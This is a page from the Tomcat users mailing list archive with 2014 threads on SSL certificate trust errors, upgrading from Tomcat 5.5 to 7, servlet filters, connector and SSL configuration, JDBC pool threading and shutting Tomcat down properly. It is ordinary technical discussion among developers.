 Trust this certificate? [no]: yes
 
 ** Step 5 – Modify webapps’s web.xml
 
 Add the following:
 <listener>
   <listener-class>
     com.sun.xml.ws.transport.http.servlet.WSServletContextListener
   </listener-class>
 </listener>
 <servlet>
   <servlet-name>tracker</servlet-name>
   <servlet-class>
     com.sun.xml.ws.transport.http.servlet.WSServlet
   </servlet-class>
 </servlet>
 <servlet-mapping>
   <servlet-name>tracker</servlet-name>
   <url-pattern>/tracker</url-pattern>
 </servlet-mapping>
 <security-constraint>
   <web-resource-collection>
     <web-resource-name>securedapp</web-resource-name>
     <url-pattern>/tracker</url-pattern>
   </web-resource-collection>
   <user-data-constraint>
     <transport-guarantee>CONFIDENTIAL</transport-guarantee>
   </user-data-constraint>
 </security-constraint>
 
 ** MY QUESTION IS THIS:
 
 I tested the web service using https and it worked for me. I provided 
 another team with my server certificate so that they could add it to 
 their truststore file but I have no idea if they did or not. All I know 
 is that they got an error loading the wsdl. The exception they got was:
 
 Error loading [https://xx.x.x.xxx:8444/appname/tracker?wsdl]
 org.apache.xmlbeans.XmlException: javax.net.ssl.SSLHandshakeException:
 sun.security.validator.ValidatorException: PKIX path building failed:
 sun.security.provider.certpath.SunCertPathBuilderException: unable to 
 find valid certification path to requested target
 
 They claim that the certificate is not properly signed. Well, I don't 
 know. It is a self-signed certificate.
 
 Any ideas would help!
 
 
  

RE: HttpServletRequest Tomcat 5.5.29 to 7.0.52

2014-03-18 Thread Martin Gainty
Seema-
 
You've asked about 10 different questions on 10 different aberrancies on your 
upgrade
zip up the whole project up and stick it on driveway or any other free site

 

That way anyone building/running the code on TC7.0.52 can at least observe  
same behaviour you are experiencing
Martin --


  



 From: seema...@hotmail.com
 To: users@tomcat.apache.org
 Subject: RE: HttpServletRequest Tomcat 5.5.29 to 7.0.52
 Date: Tue, 18 Mar 2014 14:10:19 +
 
 Any update on this Chris Schultz or anyone else? I know the images I added to 
 the email didn't show up, so if you want me to email them directly to you, I 
 can.
 Could really do with help on this, as it is not something I know much about.
 
 Thanks
 Seema
 
  From: seema...@hotmail.com
  To: users@tomcat.apache.org
  Subject: RE: HttpServletRequest Tomcat 5.5.29 to 7.0.52
  Date: Fri, 14 Mar 2014 15:15:04 +
  
  
  
   Date: Fri, 14 Mar 2014 08:36:08 -0400
   From: ch...@christopherschultz.net
   To: users@tomcat.apache.org
   Subject: Re: HttpServletRequest Tomcat 5.5.29 to 7.0.52
   
   
   Seema,
   
   On 3/14/14, 7:53 AM, Seema Patel wrote:
I have upgraded my tomcat (5.5.29 to 7.0.52) and Java (1.5 to 1.7)
for my struts servlet jsp application. I have also removed all
JCIFS authentication from the WEB-INF/web.xml file and have tried
to do BASIC authentication through Tomcat and the AD (it
authenticates me, but not sure if I've missed anything out, as I've
never done this before).
   
   One question at a time, please ;)
  
  Sorry for the off-loading of multiple questions :-)
  
   
I have a doFilter function in my code, which contains 
httpServletRequest.getServletPath() call. In the Tomcat 5.5.29 Java
1.5 version, this will work, as when I print 
httpServletRequest.getServletPath() i get the following:

P1_00.do P5_0_0.do P5_0_1.do

But in Tomcat 7.0.52 Java 1.7 I get the following from 
httpServletRequest.getServletPath() call:

P1_00.do P5_0_0.do P5_0_1.do includes/tab_defaultsettings.jsp 
includes/P1_00.do
   
   How are you printing this? Do you just have a Filter that wraps
   everything and dumps-out the ServletPath for every request? Can you
   post the code for that Filter as well as the filter and
   filter-mapping configuration you have in web.xml?
   
  
  I'm just doing a System.out.println() in the doFilter function in the 
  RequestFilter class to show which page it is. The doFilter function is:
  
  
  public void doFilter(ServletRequest request, ServletResponse response,
      FilterChain chain) throws IOException, ServletException {
    if (request instanceof HttpServletRequest) {
      final HttpServletRequest httpRequest = (HttpServletRequest) request;
      final Object userBeanObject =
          httpRequest.getSession().getAttribute(GenConstants.LOGGED_IN_USER_BEAN);
      final String pageName = httpRequest.getServletPath().replaceAll("/", "");
      System.out.println("Request Page = " + httpRequest.getServletPath());
      if (unsecuredPages.contains(pageName)) {
        // don't need any protection
        chain.doFilter(request, response);
      } else if (!(userBeanObject instanceof UserBean)) {
        // no user bean in session but one is needed: invalidate session and redirect to login
        if (httpRequest.getSession(false) != null) {
          httpRequest.getSession().invalidate();
        }
        ((HttpServletResponse) response).sendRedirect(logonPage);
      } else {
        final UserBean user = (UserBean) userBeanObject;
        Map<String,LogicalOperation> permissions =
            (Map<String,LogicalOperation>) context.getAttribute(GenConstants.PERMISSIONS_MAP);
        if (permissions == null) {
          PermissionsUtil.setupPermissions(context);
          permissions =
              (Map<String,LogicalOperation>) context.getAttribute(GenConstants.PERMISSIONS_MAP);
        }
        // look up the operation required for this page (page name without ".do")
        final LogicalOperation requiredOp =
            permissions.get(pageName.replaceAll("\\.do", ""));
        if (user.isOperationAllowed(requiredOp)) {
          chain.doFilter(request, response);
        } else {
          // not permitted: invalidate session and redirect to login
          if (httpRequest.getSession(false) != null) {
            httpRequest.getSession().invalidate();
          }
          ((HttpServletResponse) response).sendRedirect(logonPage);
        }
      }
    }
  }
  
  To give you a better idea of what was in the web.xml, here is what's been 
  taken out:
  
  <filter>
    <filter-name>NtlmHttpFilter</filter-name>
    <filter-class>jcifs.http.NtlmHttpFilter</filter-class>
    <init-param>
      <param-name>jcifs.smb.client.soTimeout</param-name>
      <param-value>3</param-value>
    </init-param>

    <!-- always needed for preauthentication / SMB signatures -->
    <init-param>
      <param-name>jcifs.smb.client.domain</param-name>
      <param-value>XXX.LOCAL</param-value>
    </init-param>
    <!-- SMB message signing requires a valid existing login -->
    <init-param>
      <param-name>jcifs.smb.client.username</param-name>
      <param-value>username</param-value>
    </init-param>
    <init-param>
      <param-name>jcifs.smb.client.password</param-name>
      <param-value>password</param-value>
    </init-param>
    <!-- Set the logging level -->
    <init-param>
  

RE: tomcat-native libraries

2014-03-18 Thread Martin Gainty


  


 Date: Tue, 18 Mar 2014 19:57:57 +0530
 Subject: Re: tomcat-native libraries
 From: randeep...@gmail.com
 To: users@tomcat.apache.org
 
 On Tue, Mar 18, 2014 at 7:29 PM, Christopher Schultz 
 ch...@christopherschultz.net wrote:
 
 
  Randeep,
 
  On 3/18/14, 9:46 AM, Randeep wrote:
   On Tue, Mar 18, 2014 at 7:13 PM, Christopher Schultz 
   ch...@christopherschultz.net wrote:
  
   John,
  
   On 3/17/14, 9:52 AM, John Smith wrote:
  
  
   Installing the native library will make a difference.
   Whether the difference is large enough to notice depends
   very much on your application. If you want to improve your
   application's performance I suspect your time would be
   better spent with a profiler to see where the bottlenecks
   are in your application.
  
   Mark
  
  
   +1 I had the native APR installed and ended up removing it in
   favor of keeping things simple. The NIO connector often
   recommended by Chris S. and others works very well.
  
   It's also a bit safer in that obscure problems rarely bring-down
   the JVM, whereas a bug in tcnative/apr/openssl can kill the entire
   JVM without warning.
  
   Using APR really only makes sense if you are using Tomcat directly
   as a web server that uses SSL, since there is a measurable
   difference between OpenSSL's performance and JSSE's performance.
  
   -chris
  
  
   Thank you Chris, In that case, I'm not going to use it. I was
   using httpd as front end to server ssl certificates. Now load
   balancer is handling it.
 
  Stick with the NIO connector. If you are using AJP to connect httpd to
  Tomcat, you will probably be better off with the BIO connector,
  actually. It's simpler and basically bug-free given its maturity.
  Since there is a 1:1 map between Tomcat and httpd connections, there's
  no really good reason to switch to another connector IMO.
 
  - -chris
 
 
 Chris,
 I'm not sure about what kind of connector I'm using. This is my
 configuration.
 
 httpd-2.2.3-65.el5.centos + tomcat-connectors-1.2.28-src +
 tomcat-connectors-1.2.28-src
 
 [root@server tomcat-connectors-1.2.28-src]# cat /etc/httpd/conf.d/mod_jk.conf
 JkWorkersFile /etc/httpd/conf.d/workers.properties
 JkLogFile /var/log/httpd/mod_jk.log
 JkLogLevel info
 JkLogStampFormat "[%a %b %d %H:%M:%S %Y] "
 JkOptions +ForwardKeySize +ForwardURICompat -ForwardDirectories
 JkRequestLogFormat "%w %V %T"
 JkMount /* worker1
 JkShmFile /etc/httpd/logs/jk-runtime-status
 
 [root@server tomcat-connectors-1.2.28-src]# cat /etc/httpd/conf.d/workers.properties
 workers.tomcat_home=/usr/share/apache-tomcat-6.0.37/
 workers.java_home=/usr/java/default
 ps=/
 worker.list=worker1
 worker.default.port=8009
 worker.default.host=localhost
 worker.default.type=ajp13
 
 Is there any way to check which type is this NIO or BIO?
MG> check the Connector in server.xml

 
 
 
 
 
 -- 
 Randeep
  

RE: filter question

2014-03-13 Thread Martin Gainty
you'll need to pass your modified response to service method of servlet which 
is *in* the filterChain


ApplicationFilterChain::internalDoFilter(ServletRequest request, 
ServletResponse response)
throws IOException, ServletException 

{

servlet.service(request, response);

...

}

Martin 


  



 Date: Thu, 13 Mar 2014 17:51:59 -0700
 Subject: filter question
 From: catph...@catphive.net
 To: users@tomcat.apache.org
 
 I have a filter with doFilter method like this:
 
 public void doFilter(ServletRequest request,
 ServletResponse response,
 FilterChain chain)
 throws IOException, ServletException {
 HttpServletRequest req = (HttpServletRequest) request;
 HttpServletResponse resp = (HttpServletResponse) response;
 
 resp.setHeader("Cache-Control",
 "must-revalidate, max-age=0, post-check=0, pre-check=0");
 
 chain.doFilter(request, response);
 }
 
 This sets the header. However, if I set the header *after* chain.doFilter,
 the header is not set. Why is this?
 
 public void doFilter(ServletRequest request,
 ServletResponse response,
 FilterChain chain)
 throws IOException, ServletException {
 HttpServletRequest req = (HttpServletRequest) request;
 HttpServletResponse resp = (HttpServletResponse) response;
 
 chain.doFilter(request, response);
 
 resp.setHeader("Cache-Control",
 "must-revalidate, max-age=0, post-check=0, pre-check=0");
 }
 
 Programmatically I can see the header is null.
 
 Has the content already been sent to the web browser after chain.doFilter?
 If so, is there a way to delay sending data to the browser? I need to
 inspect the status code in the response before setting my header (to
 prevent 404's from being cached).
 
 Thanks,
 Brendan Miller
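
One way to get the behaviour asked for above, as an added example that is not part of the original thread: wrap the response so the Cache-Control header is added at the moment an error status is set, while the response is still uncommitted. The class names are hypothetical, the javax.servlet API of the Tomcat 7 era is assumed, and it is assumed that the container keeps headers set before sendError().

```java
import java.io.IOException;
import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpServletResponseWrapper;

/** Example filter (hypothetical name): mark error responses as non-cacheable. */
public class NoCacheOnErrorFilter implements Filter {

    // Header value taken from the question above.
    private static final String NO_CACHE =
            "must-revalidate, max-age=0, post-check=0, pre-check=0";

    /**
     * Sees every status change made through the servlet API and adds the
     * header right then, instead of after chain.doFilter() returns, when
     * the container may already have written the headers to the client.
     */
    static final class StatusAwareResponse extends HttpServletResponseWrapper {

        StatusAwareResponse(HttpServletResponse response) {
            super(response);
        }

        private void markIfError(int status) {
            // setHeader() on a committed response is ignored, so check first.
            if (status >= 400 && !isCommitted()) {
                super.setHeader("Cache-Control", NO_CACHE);
            }
        }

        @Override
        public void setStatus(int sc) {
            markIfError(sc);
            super.setStatus(sc);
        }

        @Override
        @SuppressWarnings("deprecation")
        public void setStatus(int sc, String sm) {
            markIfError(sc);
            super.setStatus(sc, sm);
        }

        @Override
        public void sendError(int sc) throws IOException {
            markIfError(sc);
            super.sendError(sc);
        }

        @Override
        public void sendError(int sc, String msg) throws IOException {
            markIfError(sc);
            super.sendError(sc, msg);
        }
    }

    @Override
    public void init(FilterConfig filterConfig) {
        // No configuration needed.
    }

    @Override
    public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain)
            throws IOException, ServletException {
        if (response instanceof HttpServletResponse) {
            // Everything further down the chain now writes through the wrapper.
            response = new StatusAwareResponse((HttpServletResponse) response);
        }
        chain.doFilter(request, response);
    }

    @Override
    public void destroy() {
        // Nothing to release.
    }
}
```

Error statuses that the container sets itself after an uncaught exception do not pass through the wrapper, so those responses are not covered by this filter.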
  

RE: Stream closed- IOException exception

2014-03-06 Thread Martin Gainty


  


 Date: Thu, 6 Mar 2014 11:13:22 +0530
 Subject: Re: Stream closed- IOException exception
 From: prashantkada...@gmail.com
 To: users@tomcat.apache.org
 
 On Wed, Mar 5, 2014 at 9:34 PM, Christopher Schultz 
 ch...@christopherschultz.net wrote:
 
 
  Prashant,
 
  On 3/5/14, 9:14 AM, Prashant Kadam wrote:
   On Wed, Mar 5, 2014 at 7:11 PM, Prashant Kadam
   prashantkada...@gmail.com wrote:
  
  
  
  
   On Mon, Mar 3, 2014 at 10:55 PM, Christopher Schultz 
   ch...@christopherschultz.net wrote:
  
   Prashant,
  
   On 3/3/14, 6:04 AM, Prashant Kadam wrote:
   please help ... I have removed whitespaces by adding
   <jsp-config> <jsp-property-group>
   <url-pattern>*.jsp</url-pattern>
   <trim-directive-whitespaces>true</trim-directive-whitespaces>
   </jsp-property-group> </jsp-config> but still I am facing same
   error.
  
   This may or may not do anything.
  
   I tried to increase the buffer size also as, <%@ page
   buffer="800kb" autoFlush="false" %> but still same
   error
  
   Hm. With a huge buffer, the only reason the response would have
   been committed is if a flush() was being called somewhere. You said
   you gutted the struts actions, but it's possible that somewhere,
   Struts is internally flushing the buffer. (That would surprise me,
   honestly). Are you sure there are no errors occurring anywhere?
   Often, an error will cause the response to be committed.
  
   BTW you probably never want to use autoFlush=false unless you
   are watching the buffer very carefully. For debugging, it's fine,
   but you certainly don't want to do that on a regular basis.
  
   stuck on this issue for more than 2 weeks now and need to
   close it ASAP please help.
  
   Remember that this is a community made up of volunteers. This
   problem / ticket is *yours* and not ours to be solved ASAP.
   Everybody's issues need to be solved ASAP, of course. If you want
   something done ASAP and you can't do it yourself, then you'll have
   to pay someone else to do it.
  
   Any help/ pointer would be highly appreciated.
  
   one more things, we are using struts version 1 and tiles
   2.2. as struts1 doesn't work with tiles2, we have used
   struts-tiles2-1.4.0-SNAPSHOT.jar, can this create any
   problem, but this combination work with tomcat version
   below 7.0.37 and giving issues from version 7.0.39.
  
   Can anybody please tell me what are the changes in between
   these two versions which can produce this error??
  
   You could take a look at the Changelog for version 7.0.39 (or .38)
   to see if anything looks probable. I recommend using a debugger as
   Konstantin suggests and trap the condition. You'll be able to
   unwind the stack to see what code is causing the response to be
   committed.
  
  
  
   hi Thanks for your reply. I started debugging the code and
   found some pointers but not able to fully identify the root
   cause. What I found is,
  
   In TilesRequestProcessor class
  
   protected void doForward( String uri, HttpServletRequest
   request, HttpServletResponse response) throws IOException,
   ServletException {
  
   if (response.isCommitted()) { this.doInclude(uri, request,
   response);
  
   } else { super.doForward(uri, request, response); } }
  
   with version 7.0.39, somewhere
   org.apache.jasper.runtime.ServletResponseWrapperInclude.*isCommited*
   is setting to false, causing forward but response is already
   committed and throws IO Exception. with version 7.0.37,
   particularly for this request this flag sets to true and it
   works.
  
   any pointers on this ? how can I find from where this is
   setting to false ?
  
  
  
   I found the class *org.apache.coyote.Response* ... where this
   flag is being set, public void setCommitted(boolean v) {
   this.commited = v; }
  
   its default value is false and in my case it does not come here
   when I debug, so remains false. But when I use 7.0.37, this
   method gets called and it sets this flag to true.
  
   Is there any changes in tomcat which can cause this behavior ?
 
  I'm not sure. What did the stack trace look like when
  setCommitted(true) was called? That's more important than knowing
  /that/ it was called...
 
 
 hi Chris thanks for reply
 
 May be I failed to explain properly my understanding, I will explain the
 scenario once again
 
 I am including one jsp in another jsp, there are different behaviors for 2
 tomcat versions as below
 
 1. case in 7.0.37 - setCommitted(true) was called and thus in tiles code
 (pasted below), it includes the jsp and works fine with no exception thus
 no stack trace
 
 TilesRequestProcessor class
 protected void doForward( String uri, HttpServletRequest
 request, HttpServletResponse response) throws IOException,
 ServletException {
 if (response.isCommitted()) {
 this.doInclude(uri, request, response);
 } else {
 super.doForward(uri, request, response); }
MG> DO NOT COMMIT THE RESPONSE HERE IN THIS SERVLET
MG> ALLOW URL YOU 

RE: understanding jdbc pool

2014-03-06 Thread Martin Gainty

  


 From: neven.cvetko...@gmail.com
 Date: Wed, 5 Mar 2014 20:25:36 -0500
 Subject: Re: understanding jdbc pool
 To: users@tomcat.apache.org
 
 On Wed, Mar 5, 2014 at 3:15 PM, S Ahmed sahmed1...@gmail.com wrote:
 
  Hi,
 
  With jdbc pool, is each socket connection in the pool handled by a separate
  thread?
 
 
 Ahmed, thanks for asking this question - it is sometimes very confusing
 with all different kind of pools: connection pools, threadpools, etc...
 
 Chris pointed out already - the connection pool does not have any
 threads... It is not a process that runs in the background, these are just
 connection objects that are sitting in memory.
 
 Threads are created by the Tomcat container (executor) once the connection
 is received by the Connector. The created thread is then going to be
 handled by the container and it will go through the stack call, through
 Valves, Filters, Servlets, your middleware layer, DAOs, JDBC/JPA calls and
 then finally through your datasource object, connection, PreparedStatement,
 ResultSet, etc... and back all the way to the socket that browser
 initiated, returning the thread to the threadpool (e.g. http-bio-8080).
 
 Now, I am not sure about the connection pool implementation details, how
 connection pool keeps connections open, if there are any background threads
 that are handling connection management (closing abandoned connections,
 opening new connections as the demand rises, etc...)
 
 Maybe someone can comment on that.
MG> Not from 1.4 commons-dbcp..here is a typical reference to Thread in source
MG> Thread.currentThread().
MG> (Although I have seen multiple thread calls in attached testcases) I have not seen Separate Thread in main body
MG> I am sure someone here would put a feature request in to support Thread-Aware Connections
MG> If you put the feature request in I will second the request (and make sure ThreadAware gets implemented)
MG> Then again I'm sure there are other libraries that will handle Thread aware database connection pools
MG> would anyone know the names of those libraries?
MG> BTW Mr Schultz is right
 
  Say you have 20 connections set to be open at minimum, does that mean there
  will be 20 threads? If not, then there is a degree of serialization then
  right?
 
 
 
 Well, there will be no serialization, but rather synchronization as there
 are at most  available connections, if the connection pool (datasource)
 reaches maximum allowed connections, depending on the implementation - it
 would be a blocking call, until the pool has available connection to
 provide...
 
 Look at the documentation for Tomcat default connection pool implementation:
 https://tomcat.apache.org/tomcat-7.0-doc/jdbc-pool.html
 
 
 Hopefully that clears some of the confusion.
 
 
 Cheers!
 Neven
  

RE: java: src/network.c:441: Java_org_apache_tomcat_jni_Socket_send: Assertion failed

2014-03-05 Thread Martin Gainty
FYI If you are using NIO Connector you will want to supply these NIO Connector 
attributes

https://tomcat.apache.org/tomcat-7.0-doc/config/http.html#Standard_Implementation

 

If you are using SSL on NIO read SSL on NIO for that capability

 

APR Native SSL would use these parameters






Attribute: Description

SSLCACertificateFile: See the mod_ssl documentation.

SSLCACertificatePath: See the mod_ssl documentation.

SSLCARevocationFile: See the mod_ssl documentation.

SSLCARevocationPath: See the mod_ssl documentation.

SSLCertificateChainFile: See the mod_ssl documentation.

SSLCACertificateFile: Name of the file that contains the concatenated certificates for the trusted certificate authorities. The format is PEM-encoded.

SSLCACertificatePath: Name of the directory that contains the certificates for the trusted certificate authorities. The format is PEM-encoded.

SSLCARevocationFile: Name of the file that contains the concatenated certificate revocation lists for the certificate authorities. The format is PEM-encoded.

SSLCARevocationPath: Name of the directory that contains the certificate revocation lists for the certificate authorities. The format is PEM-encoded.

SSLCertificateChainFile: Name of the file that contains concatenated certificates for the certificate authorities which form the certificate chain for the server certificate. The format is PEM-encoded.

SSLCertificateFile: Name of the file that contains the server certificate. The format is PEM-encoded.

SSLCertificateKeyFile: Name of the file that contains the server private key. The format is PEM-encoded. The default value is the value of SSLCertificateFile and in this case both certificate and private key have to be in this file (NOT RECOMMENDED).

SSLCipherSuite: Ciphers which may be used for communicating with clients. The default is ALL, with other acceptable values being a list of ciphers, with : used as the delimiter (see OpenSSL documentation for the list of ciphers supported).

SSLDisableCompression: Disables compression if set to true and OpenSSL supports disabling compression. Default is false which inherits the default compression setting in OpenSSL.

SSLHonorCipherOrder: Set to true to enforce the server's cipher order (from the SSLCipherSuite setting) instead of allowing the client to choose the cipher (which is the default).

SSLPassword: Pass phrase for the encrypted private key. If SSLPassword is not provided, the callback function should prompt for the pass phrase.

SSLProtocol: Protocol which may be used for communicating with clients. The default value is all, which is equivalent to SSLv3+TLSv1 with other acceptable values being SSLv2, SSLv3, TLSv1 and any combination of the three protocols concatenated with a plus sign. Note that the protocol SSLv2 is inherently unsafe.

SSLVerifyClient: Ask client for certificate. The default is none, meaning the client will not have the opportunity to submit a certificate. Other acceptable values include optional, require and optionalNoCA.

SSLVerifyDepth: Maximum verification depth for client certificates. The default is 10.

 

Tweak these Connector timeout parameters to accommodate your requirement

asyncTimeout
connectionTimeout
connectionUploadTimeout
disableUploadTimeout
executorTerminationTimeoutMillis
keepAliveTimeout
socket.soTimeout
socket.unlockTimeout
selectorTimeout
sessionTimeout


(yes..Mr Schultz is correct on the last statement)
Martin-

  



 Date: Wed, 5 Mar 2014 15:12:02 +0200
 Subject: Re: java: src/network.c:441: Java_org_apache_tomcat_jni_Socket_send: 
 Assertion failed
 From: dmitry.batiyevs...@ardas.dp.ua
 To: users@tomcat.apache.org
 
 Atmosphere upgrade didn't help
 
 Regards,
 
 Dmitry Batiyevskiy
 
 Ardas Group Inc.
 
 www.ardas.dp.ua
 
 
 2014-03-05 9:39 GMT+02:00 Dmitry Batiyevskiy dmitry.batiyevs...@ardas.dp.ua
 :
 
  We are ok with tomcat 7.0.42 and old tcnative now, and may be next
  tcnative update will work appropriately
  We will try updating atmosphere before trying NIO anyway
 
  Regards,
 
  Dmitry Batiyevskiy
 
  Ardas Group Inc.
 
  www.ardas.dp.ua
 
 
  2014-03-04 23:18 GMT+02:00 Christopher Schultz 
  ch...@christopherschultz.net:
 
 
  Dmitry,
 
  On 3/4/14, 2:48 AM, Dmitry Batiyevskiy wrote:
   Howard, My connector config is the following (i've already posted
   that):
  
   <Connector port="8443" maxHttpHeaderSize="8192" maxThreads="15000"
   enableLookups="false" disableUploadTimeout="true" acceptCount="100"
   scheme="https" secure="true" SSLEnabled="true" compression="off"
   SSLCertificateFile="/opt/tomcat/mycompany.com.crt"
   SSLCertificateKeyFile="/opt/tomcat/mycompany.com.key" />
  
   Also -Dhttps.protocols=TLSv1 option is passed to java machine
  
   The reason for me to use apr connector is https performance, isn't
   NIO much slower in that?
 
  I don't have any recent performance data, but using OpenSSL is
  apparently measurably faster than using 
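
The APR SSL attribute defaults listed in this message, checked against a Connector, as an added example that is not part of the original thread: a small audit that reports which attributes a server.xml Connector leaves at the documented defaults. The class name is hypothetical, the embedded server.xml is constructed (its first Connector is the one quoted above, its second a tightened variant), and an APR connector is assumed.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.NodeList;

/** Example audit (hypothetical name): flag APR SSL attributes left at their defaults. */
public class AprSslConnectorAudit {

    // Constructed sample. Port 8443 is the Connector quoted in the thread;
    // port 8444 is a constructed variant with the SSL attributes set explicitly.
    // TLSv1 is the strictest SSLProtocol value the attribute list above offers.
    static final String SAMPLE_SERVER_XML = String.join("\n",
        "<Server><Service name=\"Catalina\">",
        "  <Connector port=\"8443\" maxHttpHeaderSize=\"8192\" maxThreads=\"15000\"",
        "    enableLookups=\"false\" disableUploadTimeout=\"true\" acceptCount=\"100\"",
        "    scheme=\"https\" secure=\"true\" SSLEnabled=\"true\" compression=\"off\"",
        "    SSLCertificateFile=\"/opt/tomcat/mycompany.com.crt\"",
        "    SSLCertificateKeyFile=\"/opt/tomcat/mycompany.com.key\" />",
        "  <Connector port=\"8444\" scheme=\"https\" secure=\"true\" SSLEnabled=\"true\"",
        "    SSLProtocol=\"TLSv1\" SSLCipherSuite=\"HIGH:!aNULL:!MD5\"",
        "    SSLHonorCipherOrder=\"true\" SSLDisableCompression=\"true\"",
        "    SSLCertificateFile=\"/opt/tomcat/mycompany.com.crt\"",
        "    SSLCertificateKeyFile=\"/opt/tomcat/mycompany.com.key\" />",
        "</Service></Server>");

    /** Returns one finding per SSL attribute that is absent or set to a weak value. */
    static List<String> audit(Element c) {
        List<String> findings = new ArrayList<String>();
        if (!"true".equalsIgnoreCase(c.getAttribute("SSLEnabled"))) {
            return findings; // not an SSL connector, nothing to check
        }
        // getAttribute() returns "" when the attribute is absent.
        String protocol = c.getAttribute("SSLProtocol");
        if (protocol.isEmpty() || protocol.equalsIgnoreCase("all")) {
            findings.add("SSLProtocol unset or 'all': default is SSLv3+TLSv1");
        } else {
            for (String p : protocol.split("\\+")) {
                String name = p.trim();
                if (name.equalsIgnoreCase("SSLv2") || name.equalsIgnoreCase("SSLv3")) {
                    findings.add("SSLProtocol enables " + name);
                }
            }
        }
        String ciphers = c.getAttribute("SSLCipherSuite");
        if (ciphers.isEmpty() || ciphers.equalsIgnoreCase("ALL")) {
            findings.add("SSLCipherSuite unset or 'ALL': every OpenSSL cipher is offered");
        }
        if (!"true".equalsIgnoreCase(c.getAttribute("SSLHonorCipherOrder"))) {
            findings.add("SSLHonorCipherOrder not true: the client chooses the cipher");
        }
        // Note: compression="off" on the quoted Connector is HTTP response
        // compression, a different setting from SSLDisableCompression.
        if (!"true".equalsIgnoreCase(c.getAttribute("SSLDisableCompression"))) {
            findings.add("SSLDisableCompression not true: OpenSSL compression default is inherited");
        }
        if (c.getAttribute("SSLCertificateKeyFile").isEmpty()) {
            findings.add("SSLCertificateKeyFile unset: private key expected inside the certificate file");
        }
        return findings;
    }

    static Document parse(String xml) throws Exception {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        // server.xml needs no DTD; refusing DOCTYPE keeps the audit tool safe from XXE.
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        return factory.newDocumentBuilder()
                .parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
    }

    public static void main(String[] args) throws Exception {
        NodeList connectors = parse(SAMPLE_SERVER_XML).getElementsByTagName("Connector");
        for (int i = 0; i < connectors.getLength(); i++) {
            Element c = (Element) connectors.item(i);
            List<String> findings = audit(c);
            System.out.println("Connector port=" + c.getAttribute("port") + ": "
                    + (findings.isEmpty() ? "no findings" : findings.size() + " finding(s)"));
            for (String finding : findings) {
                System.out.println("  - " + finding);
            }
        }
    }
}
```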

RE: Difference between process kill and shutdown

2014-03-01 Thread Martin Gainty
 Date: Sat, 1 Mar 2014 04:11:57 -0800
 Subject: Difference between process kill and shutdown
 From: akash.delh...@gmail.com
 To: users@tomcat.apache.org
 
 On our linux boxes, we have multiple users who run tomcat.
 
 Currently we are using process kill commands to kill the respective user's
 tomcat , instead of using shutdown.sh
MG> Bad Practice
 
 Are there any downsides of using this approach ?
MG> There are horrible downsides
MG> A Kill will take the running process out of the execution environment..no matter what the side effect is
MG> Hooks to any of the configured Server Listeners CATALINA has started can be ignored and usually are
MG> The result of a kill on parent process is
MG> you will still have one or more Listeners running as child daemons since they were never shutdown properly
MG> Whoever told you to use the kill command instead of shutdown should be court-martialed!

 
 Thanks,
 Akash
  

RE: Tomcat/Java Spring MVC 2.0/c3p0 - Consultant needed

2014-02-25 Thread Martin Gainty

I assume based on all the wonderful experiences the states have experienced 
in last dozen years that Canada has wised up and stopped Americans from 
sneaking across the border without a passport?

better pack your snowshoes..they have about 6 feet of snow (last time I checked)

 

Keep me apprised,
M-

  



 Date: Tue, 25 Feb 2014 11:50:30 -0400
 Subject: Re: Tomcat/Java Spring MVC 2.0/c3p0 - Consultant needed
 From: charle...@thelearningbar.com
 To: users@tomcat.apache.org
 
 On Tue, Feb 25, 2014 at 11:37 AM, Daniel Mikusa dmik...@gopivotal.com wrote:
 
  On Feb 25, 2014, at 10:14 AM, Charles Richard 
  charle...@thelearningbar.com wrote:
 
   Hi,
  
   On Tue, Feb 25, 2014 at 1:26 AM, Christopher Schultz 
   ch...@christopherschultz.net wrote:
  
  
   Charles,
  
   On 2/24/14, 10:15 AM, Charles Richard wrote:
   Sorry if this is not the right forum for this kind of inquiry. I
   figure the best candidates would be in this forum from personal
   experience.
  
   Our company is having production issues which I believe are either
   due to application inefficiencies or a bug somewhere in our
   software stack.
  
   We are having production issues with our Tomcat connection pool
   using c3p0 and while my knowledge in this area has improved, I lack
   the Java developer background that might help in this area and we
   are at a point where we need this solved quickly.
  
   I've never gotten the sense that c3p0 was production-ready. What made
   you deploy with c3p0 instead of either of the two connection pools
   that ship with Tomcat? (Note that c3p0 has nothing to do with Tomcat,
   other than that Tomcat can be configured to use c3p0 as its
   connection-pool).
  
  
   That is good to know that c3p0 might not be commonly used in production by
   companies using tomcats. I was under the impression it was the most
   commonly used.
  
  
   The problems could be related to leaked connections which I'm quite
   sure we have. I have turned on c3p0 debugging and identified this
   in the past and the ideal consultant could identify in our code
   where those are happening and fix them.
  
   Both pools Tomcat provides can help you track-down so-called
   abandoned connections by providing stack traces that point to the
   line of code that obtained the connection (or even Statement or
   ResultSet).
  
   C3P0 also allows you to track down abandoned connections and my gut
   feeling tells me how problem is not tied down exclusively to this as our
   Tomcat connection pools go from 1 used connection to 150 in a minute and I
   know we are not losing that many leaked connections in a minute.
   Regardless, I will check with the manager here to see if this has been
   tried in the past before I started this job and potentially try this as
   unfortunately, the problem is not happening in our staging environment.
 
  When you are experiencing the problem next, take some thread dumps. Try
  to get two or three, with 10 to 15 seconds between each one. You can then
  look at the thread dumps to see what's going on here.
 
 
  https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
 
 
 It's not easy to get good thread dumps as one minute things are fine and
 the next minute, the site is going downhill. I have bash scripts that
 monitor c3p0 connections and take an automatic thread dump as soon as the
 number exceeds what's normal.
 
 
  There is information about interpreting them here or if you need help with
  it, you could post it to the list.
 
 
  https://wiki.apache.org/tomcat/HowTo#How_do_I_read_a_Java_thread_dump_.3F
 
  I have tried to analyze the thread dumps I have gotten so far without much
 luck but this could just be that I don't understand enough what I'm looking
 for. I will look at the link provided.
 
 Thanks for taking the time to write this!
 
 Dan
 
  Cheers,
 Charles
 
  
  
